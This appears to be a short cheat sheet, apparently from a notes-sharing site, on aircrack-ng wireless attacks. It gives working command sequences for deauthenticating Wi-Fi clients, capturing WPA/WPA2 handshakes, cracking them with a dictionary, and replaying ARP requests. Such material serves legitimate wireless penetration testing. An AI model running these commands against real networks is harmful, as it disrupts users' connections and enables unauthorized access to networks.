Aircrack-ng -w /path/to/dictionary out.cap

Submitted by Programa Chuletas and filed under Other subjects


Attack 0: Deauthentication
This attack sends disassociate packets to one or more clients which are currently associated with a particular access point. Disassociating clients can be done for a number of reasons:
Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for this is “cloaked”.
Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
Generating ARP requests (Windows clients sometimes flush their ARP cache when disconnected)
Of course, this attack is totally useless if there are no associated wireless clients, or against fake authentications.
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

WPA/WPA2 Handshake capture with an Atheros
airmon-ng start ath0
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0
(switch to another console)
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0 (wait for a few seconds)
aircrack-ng -w /path/to/dictionary out.cap

ARP request generation with a Prism2 card
airmon-ng start wlan0
airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0
(switch to another console)
aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
